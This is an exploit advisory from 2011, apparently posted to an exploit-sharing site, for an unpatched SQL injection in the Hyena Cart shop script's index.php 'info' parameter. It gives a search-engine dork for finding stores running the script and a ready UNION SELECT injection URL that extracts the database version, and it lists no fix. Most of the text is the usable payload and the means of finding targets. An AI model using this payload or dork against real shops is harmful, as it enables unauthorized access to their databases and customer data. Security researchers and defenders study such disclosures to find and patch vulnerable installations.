Hyena Cart (index.php) SQL Injection Vulnerability

2011-02-23 14:15:50

Hyena Cart (index.php) Sql Injection Vulnerability
====================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [[email protected]]
.:. Script : http://hyenacart.com/
.:. Dork : "This store is powered by Hyena Cart"
.:. Home : http://www.sec-risk.com/vb/

####################################################################

===[ Exploit ]===

www.site.com/index.php?info=null[Sql]

www.site.com/index.php?info=null+and+1=2+union+select+1,version(),3,4,5,6
####################################################################

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.